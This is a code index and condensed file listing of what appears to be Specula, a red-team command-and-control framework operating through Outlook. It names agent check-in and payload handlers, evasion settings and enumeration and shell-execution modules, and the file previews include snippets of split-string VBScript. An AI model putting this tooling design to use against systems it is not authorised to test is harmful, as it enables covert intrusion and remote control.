method init_blocklist (line 255) | def init_blocklist(self):
method listblocklist (line 267) | def listblocklist(self):
method listallowlist (line 275) | def listallowlist(self):
method addblocklist (line 284) | def addblocklist(self, ip, auto=True):
method inblocklist (line 309) | def inblocklist(self, ip):
method pastenddate (line 323) | def pastenddate(self):
FILE: lib/core/setup.py
function isdate (line 15) | def isdate(value):
class Config (line 28) | class Config:
method __init__ (line 29) | def __init__(self, configpath):
method _getopt (line 46) | def _getopt(msg, validator=None, value=None):
method _setup (line 53) | def _setup(self):
method _save_config (line 100) | def _save_config(self):
method PUSHOVER_API_TOKEN (line 105) | def PUSHOVER_API_TOKEN(self):
method PUSHOVER_API_TOKEN (line 109) | def PUSHOVER_API_TOKEN(self, value):
method PUSHOVER_APP_API_TOKEN (line 117) | def PUSHOVER_APP_API_TOKEN(self):
method PUSHOVER_APP_API_TOKEN (line 121) | def PUSHOVER_APP_API_TOKEN(self, value):
method TIME_FORMAT (line 129) | def TIME_FORMAT(self):
method TIME_FORMAT (line 133) | def TIME_FORMAT(self, value):
method DNS_NAME (line 138) | def DNS_NAME(self):
method DNS_NAME (line 142) | def DNS_NAME(self, value):
method INITIAL_CHECKIN_COUNT (line 148) | def INITIAL_CHECKIN_COUNT(self):
method INITIAL_CHECKIN_COUNT (line 152) | def INITIAL_CHECKIN_COUNT(self,value):
method VALIDATE_URL (line 158) | def VALIDATE_URL(self):
method VALIDATE_URL (line 162) | def VALIDATE_URL(self, value):
method BASE_PATH_AGENT_COM (line 170) | def BASE_PATH_AGENT_COM(self):
method BASE_PATH_AGENT_COM (line 174) | def BASE_PATH_AGENT_COM(self, value):
method BASE_PAYLOAD_URL (line 182) | def BASE_PAYLOAD_URL(self):
method BASE_PAYLOAD_URL (line 186) | def BASE_PAYLOAD_URL(self, value):
method REDIRECT_FALSE_AGENTS (line 194) | def REDIRECT_FALSE_AGENTS(self):
method REDIRECT_FALSE_AGENTS (line 198) | def REDIRECT_FALSE_AGENTS(self, value):
method ENCRYPTIONKEY_VALUENAME (line 204) | def ENCRYPTIONKEY_VALUENAME(self):
method ENCRYPTIONKEY_VALUENAME (line 208) | def ENCRYPTIONKEY_VALUENAME(self, value):
method ENCRYPTIONKEY_REGISTRY_LOCATION (line 214) | def ENCRYPTIONKEY_REGISTRY_LOCATION(self):
method ENCRYPTIONKEY_REGISTRY_LOCATION (line 218) | def ENCRYPTIONKEY_REGISTRY_LOCATION(self, value):
method DEFAULT_REFRESH_TIME (line 228) | def DEFAULT_REFRESH_TIME(self):
method DEFAULT_REFRESH_TIME (line 232) | def DEFAULT_REFRESH_TIME(self,value):
method SPECULA_LOG_FILE (line 238) | def SPECULA_LOG_FILE(self):
method SPECULA_LOG_FILE (line 242) | def SPECULA_LOG_FILE(self,value):
method OPERATOR_LOG_FILE (line 248) | def OPERATOR_LOG_FILE(self):
method OPERATOR_LOG_FILE (line 252) | def OPERATOR_LOG_FILE(self,value):
method SERVER_HEADER (line 258) | def SERVER_HEADER(self):
method SERVER_HEADER (line 262) | def SERVER_HEADER(self, value):
method OUTLOOK_VIEW_ID (line 268) | def OUTLOOK_VIEW_ID(self):
method OUTLOOK_VIEW_ID (line 272) | def OUTLOOK_VIEW_ID(self, value):
method CLSID (line 278) | def CLSID(self):
method CLSID (line 282) | def CLSID(self, value):
method DATABASEFILENAME (line 288) | def DATABASEFILENAME(self):
method DATABASEFILENAME (line 292) | def DATABASEFILENAME(self,value):
method PAYLOADFILENAME (line 298) | def PAYLOADFILENAME(self):
method PAYLOADFILENAME (line 302) | def PAYLOADFILENAME(self,value):
method SSL (line 308) | def SSL(self):
method SSL (line 312) | def SSL(self, value):
method CERT_FILE (line 319) | def CERT_FILE(self):
method CERT_FILE (line 323) | def CERT_FILE(self,value):
method KEY_FILE (line 329) | def KEY_FILE(self):
method KEY_FILE (line 333) | def KEY_FILE(self,value):
method JITTER (line 339) | def JITTER(self):
method JITTER (line 343) | def JITTER(self, value):
method IP_blocklist (line 349) | def IP_blocklist(self):
method IP_blocklist (line 353) | def IP_blocklist(self, value):
method END_DATE (line 358) | def END_DATE(self):
method END_DATE (line 366) | def END_DATE(self, value):
method WEBSERVER_PORT (line 373) | def WEBSERVER_PORT(self):
method WEBSERVER_PORT (line 377) | def WEBSERVER_PORT(self,value):
method PUSH_VALIDATION (line 383) | def PUSH_VALIDATION(self):
method PUSH_VALIDATION (line 387) | def PUSH_VALIDATION(self, value):
method PUSH_NEWAGENT (line 395) | def PUSH_NEWAGENT(self):
method PUSH_NEWAGENT (line 399) | def PUSH_NEWAGENT(self, value):
method PUSH_NEWIP (line 407) | def PUSH_NEWIP(self):
method PUSH_NEWIP (line 411) | def PUSH_NEWIP(self, value):
method PUSH_UNEXPECTEDCALLBACK (line 419) | def PUSH_UNEXPECTEDCALLBACK(self):
method PUSH_UNEXPECTEDCALLBACK (line 423) | def PUSH_UNEXPECTEDCALLBACK(self, value):
method PUSH_UNKNOWNCONNECTION (line 431) | def PUSH_UNKNOWNCONNECTION(self):
method PUSH_UNKNOWNCONNECTION (line 435) | def PUSH_UNKNOWNCONNECTION(self, value):
method PUSH_PRESTAGE (line 443) | def PUSH_PRESTAGE(self):
method PUSH_PRESTAGE (line 447) | def PUSH_PRESTAGE(self, value):
method PUSH_CONNECTION_OUTSIDESPECULA (line 455) | def PUSH_CONNECTION_OUTSIDESPECULA(self):
method PUSH_CONNECTION_OUTSIDESPECULA (line 459) | def PUSH_CONNECTION_OUTSIDESPECULA(self, value):
FILE: lib/core/specagents.py
class AgentListClass (line 8) | class AgentListClass(UserList):
method __init__ (line 9) | def __init__(self):
method get_agent (line 12) | def get_agent(self, id):
method get_agent_hostname (line 18) | def get_agent_hostname(self, name):
method get_max_id (line 24) | def get_max_id(self):
method get_agents_id (line 33) | def get_agents_id(self):
method get_prestaged_agents (line 39) | def get_prestaged_agents(self):
method register_agent (line 47) | def register_agent(self, sessionid,remoteip,useragent,lastcheckin):
class AgentClass (line 63) | class AgentClass:
method __init__ (line 64) | def __init__(self, sessionid, myid):
method generate_com (line 94) | def generate_com(self):
method generate_customcom (line 103) | def generate_customcom(self, url, codeurl, supporturl):
method update_callback (line 109) | def update_callback(self):
method updateinitialcheckincount (line 112) | def updateinitialcheckincount(self, initialcheckincount):
method size_taskqueue (line 115) | def size_taskqueue(self):
method remove_task (line 118) | def remove_task(self):
method add_task (line 121) | def add_task(self, item):
method get_nexttask (line 124) | def get_nexttask(self):
FILE: lib/core/specmodule.py
class SpecModule (line 5) | class SpecModule:
method __init__ (line 6) | def __init__(self, templatepath=None):
method set_option (line 17) | def set_option(self, optionname, value):
method get_option (line 25) | def get_option(self, optionname):
method _validate_option (line 31) | def _validate_option(self, optionname, value):
method check_required (line 39) | def check_required(self):
method preprocess (line 49) | def preprocess(self, agent):
method rethandler (line 60) | def rethandler(self, agent, options, data):
method cleanup (line 63) | def cleanup(self):
FILE: lib/core/specpayload.py
class PayloadListClass (line 11) | class PayloadListClass(UserList):
method __init__ (line 12) | def __init__(self):
method get_payload_id (line 15) | def get_payload_id(self, id):
method get_payload_name (line 21) | def get_payload_name(self, name):
method get_payloads_id (line 27) | def get_payloads_id(self):
method register_payload (line 33) | def register_payload(self, sourcepath, destinationname):
method remove_payload (line 47) | def remove_payload(self, selected_payload):
class PayloadClass (line 51) | class PayloadClass:
method __init__ (line 52) | def __init__(self):
method generate_payload (line 58) | def generate_payload(self):
FILE: lib/core/spectaskbook.py
class SpecTaskBook (line 4) | class SpecTaskBook(SpecModule):
method __init__ (line 5) | def __init__(self):
FILE: lib/core/utility.py
function encrypt_code (line 5) | def encrypt_code(code, key):
function decrypt_code (line 23) | def decrypt_code(code, key):
class TaskClass (line 39) | class TaskClass:
method __init__ (line 40) | def __init__(self, funcname, code, entry, options, encrypt=True, statu...
FILE: lib/core/utils.py
function getChars (line 20) | def getChars(inputstring):
function ConvertToArray (line 30) | def ConvertToArray(inputint):
function ConvertBackToInt (line 41) | def ConvertBackToInt(inputstring):
FILE: lib/handlers/specapplication.py
class speculaApplication (line 7) | class speculaApplication(tornado.web.Application):
method __init__ (line 8) | def __init__(self, helpers, handlers = None, default_host = None, tran...
FILE: lib/handlers/speccomms.py
class AgentComHandler (line 27) | class AgentComHandler(tornado.web.RequestHandler):
method set_default_headers (line 28) | def set_default_headers(self):
method get (line 31) | def get(self):
method post (line 187) | def post(self):
FILE: lib/handlers/specdevcomms.py
class AgentDevComHandler (line 9) | class AgentDevComHandler(tornado.web.RequestHandler):
method set_default_headers (line 10) | def set_default_headers(self):
method get (line 13) | def get(self):
method post (line 158) | def post(self):
FILE: lib/handlers/specpayload.py
class PayloadHandler (line 5) | class PayloadHandler(tornado.web.StaticFileHandler):
method set_default_headers (line 6) | def set_default_headers(self):
FILE: lib/handlers/specvalidate.py
class ValidateAgentHandler (line 9) | class ValidateAgentHandler(tornado.web.RequestHandler):
method set_default_headers (line 10) | def set_default_headers(self):
method get (line 14) | def get(self):
method post (line 62) | def post(self):
class UnknownPageHandler (line 146) | class UnknownPageHandler(tornado.web.RequestHandler):
method set_default_headers (line 149) | def set_default_headers(self):
method get (line 152) | def get(self):
FILE: lib/menu/specpromptdbedit.py
class SpecPromptDbedit (line 13) | class SpecPromptDbedit(cmd.Cmd):
method __init__ (line 14) | def __init__(self, selected_agent, helpers):
method precmd (line 26) | def precmd(self, line): # Added for operator logging
method emptyline (line 30) | def emptyline(self):
method do_list (line 41) | def do_list(self, inp):
method help_list (line 56) | def help_list(self):
method do_set (line 60) | def do_set(self, cmd):
method help_set (line 79) | def help_set(self):
method complete_set (line 87) | def complete_set(self, text, line, begidx, endidx):
method do_clear (line 92) | def do_clear(self, inp):
method help_clear (line 95) | def help_clear(self):
method do_back (line 99) | def do_back(self, inp):
method help_back (line 102) | def help_back(self):
FILE: lib/menu/specpromptexplorer.py
class SpecPromptExplorer (line 13) | class SpecPromptExplorer(cmd.Cmd):
method __init__ (line 14) | def __init__(self, selected_agent, helpers):
method precmd (line 26) | def precmd(self, line): # Added for operator logging
method emptyline (line 30) | def emptyline(self):
method do_back (line 41) | def do_back(self, inp):
method help_back (line 44) | def help_back(self):
method do_clear (line 48) | def do_clear(self, inp):
method help_clear (line 51) | def help_clear(self):
method do_refreshtime (line 55) | def do_refreshtime(self, inp):
method help_refreshtime (line 62) | def help_refreshtime(self):
method do_jitter (line 66) | def do_jitter(self, inp):
method help_jitter (line 73) | def help_jitter(self):
method do_pushnextcallback (line 77) | def do_pushnextcallback(self, inp):
method help_pushnextcallback (line 80) | def help_pushnextcallback(self):
method do_ls (line 83) | def do_ls(self, inp):
method help_ls (line 103) | def help_ls(self):
method do_cd (line 107) | def do_cd(self, inp):
method help_cd (line 118) | def help_cd(self):
method do_pwd (line 124) | def do_pwd(self, inp):
method help_pwd (line 130) | def help_pwd(self):
method do_cat (line 135) | def do_cat(self, inp):
method help_cat (line 150) | def help_cat(self):
FILE: lib/menu/specpromptinteract.py
class SpecPromptInteract (line 10) | class SpecPromptInteract(cmd.Cmd):
method __init__ (line 11) | def __init__(self, selected_agent, helpers):
method precmd (line 22) | def precmd(self, line): # Added for operator logging
method emptyline (line 26) | def emptyline(self):
method do_back (line 37) | def do_back(self, inp):
method help_back (line 40) | def help_back(self):
method do_info (line 44) | def do_info(self, inp):
method help_info (line 59) | def help_info(self):
method do_clear (line 63) | def do_clear(self, inp):
method help_clear (line 66) | def help_clear(self):
method do_clearagentdata (line 70) | def do_clearagentdata(self, inp):
method help_clearagentdata (line 80) | def help_clearagentdata(self):
method do_delete (line 84) | def do_delete(self, inp):
method help_delete (line 95) | def help_delete(self):
method do_refreshtime (line 99) | def do_refreshtime(self, inp):
method help_refreshtime (line 106) | def help_refreshtime(self):
method do_jitter (line 110) | def do_jitter(self, inp):
method help_jitter (line 117) | def help_jitter(self):
method do_data (line 121) | def do_data(self, inp):
method help_data (line 128) | def help_data(self):
method do_qlist (line 132) | def do_qlist(self, inp):
method help_qlist (line 150) | def help_qlist(self):
method do_qdel (line 154) | def do_qdel(self, inp):
method help_qdel (line 174) | def help_qdel(self):
method do_usemodule (line 179) | def do_usemodule(self, inp):
method help_usemodule (line 200) | def help_usemodule(self):
method do_explorer (line 204) | def do_explorer(self, inp):
method help_explorer (line 226) | def help_explorer(self):
method do_pushnextcallback (line 230) | def do_pushnextcallback(self, inp):
method help_pushnextcallback (line 233) | def help_pushnextcallback(self):
method complete_usemodule (line 236) | def complete_usemodule(self, text, line, begidx, endidx):
method do_runTaskBook (line 239) | def do_runTaskBook(self, cmd):
method complete_runTaskBook (line 253) | def complete_runTaskBook(self, text, line, begidx, endidx):
method help_runTaskbook (line 256) | def help_runTaskbook(self):
FILE: lib/menu/specpromptmodule.py
class SpecPromptModule (line 9) | class SpecPromptModule(cmd.Cmd):
method __init__ (line 10) | def __init__(self, helpers, selected_module, selected_agent, prompt):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 37) | def emptyline(self):
method do_back (line 48) | def do_back(self, inp):
method help_back (line 51) | def help_back(self):
method do_options (line 55) | def do_options(self, cmd):
method help_options (line 64) | def help_options(self):
method do_set (line 68) | def do_set(self, cmd):
method complete_set (line 81) | def complete_set(self, text, line, start_index, end_index):
method help_set (line 109) | def help_set(self):
method do_run (line 113) | def do_run(self, inp):
method help_run (line 132) | def help_run(self):
method do_add (line 136) | def do_add(self, inp):
method help_add (line 155) | def help_add(self):
method do_clear (line 159) | def do_clear(self, inp):
method help_clear (line 162) | def help_clear(self):
FILE: lib/menu/specpromptpayload.py
class SpecPromptPayload (line 13) | class SpecPromptPayload(cmd.Cmd):
method __init__ (line 14) | def __init__(self, helpers):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 28) | def emptyline(self):
method do_clear (line 39) | def do_clear(self, inp):
method do_list (line 42) | def do_list(self, inp):
method help_list (line 45) | def help_list(self):
method do_remove (line 49) | def do_remove(self, inp):
method complete_remove (line 73) | def complete_remove(self, text, line, begidx, endidx):
method help_remove (line 79) | def help_remove(self):
method do_add (line 83) | def do_add(self, inp):
method complete_add (line 103) | def complete_add(self, text, line, begidx, endidx):
method do_list (line 106) | def do_list(self, inp):
method help_add (line 114) | def help_add(self):
method help_clear (line 119) | def help_clear(self):
method do_back (line 123) | def do_back(self, inp):
method help_back (line 126) | def help_back(self):
FILE: lib/menu/specpromptprestage.py
class SpecPromptPrestage (line 11) | class SpecPromptPrestage(cmd.Cmd):
method __init__ (line 12) | def __init__(self, helpers):
method precmd (line 22) | def precmd(self, line): # Added for operator logging
method emptyline (line 26) | def emptyline(self):
method do_clear (line 37) | def do_clear(self, inp):
method help_clear (line 40) | def help_clear(self):
method do_back (line 44) | def do_back(self, inp):
method help_back (line 47) | def help_back(self):
method do_list (line 51) | def do_list(self, inp):
method help_list (line 60) | def help_list(self):
method do_new (line 64) | def do_new(self, inp):
method help_new (line 100) | def help_new(self):
method do_custom (line 105) | def do_custom(self, inp):
method do_dev (line 129) | def do_dev(self, inp):
method help_custom (line 150) | def help_custom(self):
FILE: lib/menu/specpromptpushover.py
class SpecPromptPushover (line 13) | class SpecPromptPushover(cmd.Cmd):
method __init__ (line 14) | def __init__(self, helpers):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 28) | def emptyline(self):
method do_clear (line 39) | def do_clear(self, inp):
method do_listpushoverkeys (line 42) | def do_listpushoverkeys(self, inp):
method help_listpushoverkeys (line 52) | def help_listpushoverkeys(self):
method do_removepushoverkey (line 56) | def do_removepushoverkey(self, inp):
method complete_removepushoverkey (line 69) | def complete_removepushoverkey(self, text, line, begidx, endidx):
method help_removepushoverkey (line 72) | def help_removepushoverkey(self):
method do_addpushoverkey (line 76) | def do_addpushoverkey(self, inp):
method help_addpushoverkey (line 92) | def help_addpushoverkey(self):
method do_testpush (line 96) | def do_testpush(self, cmd):
method help_testpush (line 100) | def help_testpush(self):
method do_subscriptions (line 104) | def do_subscriptions(self, inp):
method help_subscriptions (line 116) | def help_subscriptions(self):
method do_changesubscription (line 120) | def do_changesubscription(self, cmd):
method complete_changesubscription (line 133) | def complete_changesubscription(self, text, line, begidx, endidx):
method help_changesubscription (line 139) | def help_changesubscription(self):
method help_clear (line 143) | def help_clear(self):
method do_back (line 147) | def do_back(self, inp):
method help_back (line 150) | def help_back(self):
FILE: lib/modhandlers/generic.py
function quotedstring (line 2) | def quotedstring(value, **kwargs):
function escapebackslash (line 7) | def escapebackslash(value, **kwargs):
function makeint (line 12) | def makeint(value, **kwargs):
function makelist (line 15) | def makelist(value, **kwargs):
function escapequotes (line 19) | def escapequotes(value, **kwargs):
function makebool (line 22) | def makebool(value, **kwargs):
FILE: lib/tab_completers/generic.py
function tab_choice (line 3) | def tab_choice(val, line, **kwargs):
FILE: lib/validators/files.py
function isreadable (line 4) | def isreadable(path, **kwargs):
function isbasename (line 18) | def isbasename(path, **kwargs):
FILE: lib/validators/generic.py
function iswebaddress (line 4) | def iswebaddress(val, **kwargs):
function isboolstring (line 11) | def isboolstring(val, **kwargs):
function maxlen (line 24) | def maxlen(val, **kwargs):
function ischoice (line 38) | def ischoice(val, **kwargs):
function isint (line 52) | def isint(val, **kwargs):
FILE: specula.py
class SpecPrompt (line 86) | class SpecPrompt(cmd.Cmd): #Leaving this one here as it is the top level...
method __init__ (line 87) | def __init__(self, helpers):
method precmd (line 96) | def precmd(self, line): # Added for operator logging
method emptyline (line 100) | def emptyline(self):
method do_exit (line 111) | def do_exit(self, inp):
method help_exit (line 115) | def help_exit(self):
method do_updatecodebase (line 118) | def do_updatecodebase(self, inp):
method help_updatecodebase (line 124) | def help_updatecodebase(self):
method do_generatehooker (line 128) | def do_generatehooker(self, inp):
method help_generatehooker (line 141) | def help_generatehooker(self):
method do_agents (line 146) | def do_agents(self, inp):
method help_agents (line 160) | def help_agents(self):
method do_interact (line 164) | def do_interact(self, inp):
method help_interact (line 183) | def help_interact(self):
method complete_interact (line 187) | def complete_interact(self, text, line, begidx, endidx):
method do_pushover (line 191) | def do_pushover(self, inp):
method do_payload (line 202) | def do_payload(self, inp):
method help_payload (line 213) | def help_payload(self):
method do_dbedit (line 217) | def do_dbedit(self, inp):
method help_dbedit (line 230) | def help_dbedit(self):
method complete_dbedit (line 234) | def complete_dbedit(self, text, line, begidx, endidx):
method do_prestage (line 238) | def do_prestage(self, inp):
method help_prestage (line 249) | def help_prestage(self):
method do_settings (line 253) | def do_settings(self, inp): # Read from config file later on...
method help_settings (line 287) | def help_settings(self):
method do_listblocklist (line 291) | def do_listblocklist(self, cmd):
method do_listallowlist (line 294) | def do_listallowlist(self, cmd):
method do_addblocklist (line 297) | def do_addblocklist(self,cmd):
method help_addblocklist (line 305) | def help_addblocklist(self):
method do_updateSetting (line 309) | def do_updateSetting(self, cmd):
method do_approveAgent (line 329) | def do_approveAgent(self, cmd):
method complete_approveAgent (line 342) | def complete_approveAgent(self, text, line, begidx, endidx):
method help_approveAgent (line 345) | def help_approveAgent(self):
method do_blocklistAgent (line 348) | def do_blocklistAgent(self, cmd):
method complete_blocklistAgent (line 362) | def complete_blocklistAgent(self, text, line, begidx, endidx):
method help_blocklistAgent (line 365) | def help_blocklistAgent(self):
method help_updateSetting (line 369) | def help_updateSetting(self):
method complete_updateSetting (line 375) | def complete_updateSetting(self, text, line, begidx, endidx):
method do_clear (line 378) | def do_clear(self, inp):
method do_listallq (line 381) | def do_listallq(self, cmd):
method help_listallq (line 395) | def help_listallq(self):
method help_clear (line 399) | def help_clear(self):
method do_logo (line 403) | def do_logo(self, inp):
method help_logo (line 406) | def help_logo(self):
method do_dbdata (line 410) | def do_dbdata(self, inp):
method help_dbdata (line 428) | def help_dbdata(self):
method complete_dbdata (line 432) | def complete_dbdata(self, text, line, begidx, endidx):
method do_log (line 436) | def do_log(self, inp):
method help_log (line 442) | def help_log(self):
method do_resetdb (line 446) | def do_resetdb(self, inp):
method help_resetdb (line 457) | def help_resetdb(self):
method default (line 461) | def default(self, inp):
method do_runTaskbook (line 467) | def do_runTaskbook(self, cmd):
method complete_runTaskbook (line 490) | def complete_runTaskbook(self, text, line, begidx, endidx):
method help_runTaskbook (line 502) | def help_runTaskbook(self):
method do_version (line 505) | def do_version(self, version):
method help_version (line 508) | def help_version(self):
function sig_handler (line 511) | def sig_handler(server, sig, frame):
function main_c2 (line 533) | def main_c2(helpers):
function gen_logo (line 564) | def gen_logo():
Condensed preview — 312 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (634K chars).
[
{
"path": ".gitignore",
"chars": 163,
"preview": "*.db\r\nconfigoptions.py\r\nspecConfig.ini\r\nDefaultBlacklist.txt\r\n.vscode/\r\nspecula_log.txt\r\nweblog.log\r\noperator_log.txt\r\na"
},
{
"path": "CONTRIBUTING.md",
"chars": 1411,
"preview": "# Contributions\nIf you are considering contributing to our repository, first thank you for doing so! </br>\n\nContribution"
},
{
"path": "README.md",
"chars": 140,
"preview": "Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trust"
},
{
"path": "Taskbooks/enum_installed_software.py",
"chars": 1471,
"preview": "def TaskBook(helpers, agent):\n mod = helpers.get_module('operation/file/list_dir')\n helpers.setModOption(mod, 'dir"
},
{
"path": "Taskbooks/example.py",
"chars": 696,
"preview": "def TaskBook(helpers, agent):\n mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take argument"
},
{
"path": "api/README.md",
"chars": 12,
"preview": "# SpeculaApi"
},
{
"path": "api/SpeculaApi/Sepcula.cpp",
"chars": 3767,
"preview": "// Sepcula.cpp : Implementation of CSepcula\r\n\r\n#include \"pch.h\"\r\n#include \"Sepcula.h\"\r\n\r\n#define BUFFERSIZE 4096\r\n// CSe"
},
{
"path": "api/SpeculaApi/Sepcula.h",
"chars": 1006,
"preview": "// Sepcula.h : Declaration of the CSepcula\r\n\r\n#pragma once\r\n#include \"resource.h\" // main symbols\r\n\r\n\r\n\r\n#include "
},
{
"path": "api/SpeculaApi/Sepcula.rgs",
"chars": 595,
"preview": "HKCR\r\n{\r\n\tSpeculaApi.Specula.1 = s 'Specula class'\r\n\t{\r\n\t\tCLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}'\r\n\t}\r\n\tSpecu"
},
{
"path": "api/SpeculaApi/SpeculaApi.cpp",
"chars": 1617,
"preview": "// SpeculaApi.cpp : Implementation of DLL Exports.\r\n\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r"
},
{
"path": "api/SpeculaApi/SpeculaApi.def",
"chars": 209,
"preview": "; SpeculaApi.def : Declares the module parameters.\r\n\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllCanUnloadNow\t\tPRIVATE\r\n\tDllGetClassObject\t"
},
{
"path": "api/SpeculaApi/SpeculaApi.idl",
"chars": 836,
"preview": "// SpeculaApi.idl : IDL source for SpeculaApi\r\n//\r\n\r\n// This file will be processed by the MIDL tool to\r\n// produce the "
},
{
"path": "api/SpeculaApi/SpeculaApi.rgs",
"chars": 12,
"preview": "HKCR\r\n{\r\n}\r\n"
},
{
"path": "api/SpeculaApi/SpeculaApi.vcxproj",
"chars": 14900,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "api/SpeculaApi/SpeculaApi.vcxproj.filters",
"chars": 2787,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "api/SpeculaApi/SpeculaApi_i.h",
"chars": 9077,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler "
},
{
"path": "api/SpeculaApi/SpeculaApips.def",
"chars": 139,
"preview": "\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllGetClassObject\t\tPRIVATE\r\n\tDllCanUnloadNow\t\t\tPRIVATE\r\n\tDllRegisterServer\t\tPRIVATE\r\n\tDllUnregist"
},
{
"path": "api/SpeculaApi/dllmain.cpp",
"chars": 374,
"preview": "// dllmain.cpp : Implementation of DllMain.\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r\n#include"
},
{
"path": "api/SpeculaApi/dllmain.h",
"chars": 316,
"preview": "// dllmain.h : Declaration of module class.\r\n\r\nclass CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >"
},
{
"path": "api/SpeculaApi/framework.h",
"chars": 394,
"preview": "#pragma once\r\n\r\n#ifndef STRICT\r\n#define STRICT\r\n#endif\r\n\r\n#include \"targetver.h\"\r\n\r\n#define _ATL_APARTMENT_THREADED\r\n\r\n#"
},
{
"path": "api/SpeculaApi/pch.cpp",
"chars": 191,
"preview": "// pch.cpp: source file corresponding to the pre-compiled header\r\n\r\n#include \"pch.h\"\r\n\r\n// When you are using pre-compil"
},
{
"path": "api/SpeculaApi/pch.h",
"chars": 576,
"preview": "// pch.h: This is a precompiled header file.\r\n// Files listed below are compiled only once, improving build performance "
},
{
"path": "api/SpeculaApi/resource.h",
"chars": 542,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by SpeculaApi.rc\r\n//\r\n#define IDS_PROJNA"
},
{
"path": "api/SpeculaApi/targetver.h",
"chars": 314,
"preview": "#pragma once\r\n\r\n// Including SDKDDKVer.h defines the highest available Windows platform.\r\n\r\n// If you wish to build your"
},
{
"path": "api/SpeculaApi.sln",
"chars": 2071,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.7.3"
},
{
"path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj",
"chars": 11147,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters",
"chars": 1547,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "functions/api/install_api.py",
"chars": 4028,
"preview": "import copy\nimport os\n\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeb"
},
{
"path": "functions/api/install_api.txt",
"chars": 4182,
"preview": "\r\nFunction install_api()\r\n\tOn Error Resume Next\r\n\tis64 = false\r\n\tSet objLocator = window.external.OutlookApplication.Cre"
},
{
"path": "functions/api/load_dll.py",
"chars": 840,
"preview": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/load_dll.txt",
"chars": 257,
"preview": "Function load_dll\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"SpeculaAp"
},
{
"path": "functions/api/remove_api.py",
"chars": 1684,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\n\nclass Spec(SpecMod"
},
{
"path": "functions/api/remove_api.txt",
"chars": 1206,
"preview": "\r\nFunction remove_api()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/api/run_shell.py",
"chars": 867,
"preview": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/run_shell.txt",
"chars": 201,
"preview": "Function run_shell_api()\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"Sp"
},
{
"path": "functions/api/verify_api.py",
"chars": 913,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/verify_api.txt",
"chars": 250,
"preview": "Function api_verify()\n On error resume next\n Set specApi = window.external.OutlookApplication.CreateObject(\"Specul"
},
{
"path": "functions/enumerate/host/list_amsiproviders.py",
"chars": 899,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_amsiproviders.txt",
"chars": 952,
"preview": "Function list_amsiproviders()\r\n\tOn error resume next\r\n\tconst REG_SZ = 1\r\n\tconst REG_EXPAND_SZ = 2\r\n\tconst REG_BINARY = 3"
},
{
"path": "functions/enumerate/host/list_applocker.py",
"chars": 702,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_applocker.txt",
"chars": 1428,
"preview": "Function list_applocker()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_autoruns.py",
"chars": 1558,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_autoruns.txt",
"chars": 3734,
"preview": "Function list_autoruns()\r\n\tOn error resume next\r\n\tlist_autoruns = \"HKCU Autoruns:\" & vbCrLf\r\n\tlist_autoruns = list_autor"
},
{
"path": "functions/enumerate/host/list_basic.py",
"chars": 859,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_basic.txt",
"chars": 834,
"preview": "Function list_basic()\r\n\tOn error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wsc\" & \"ript.Sh"
},
{
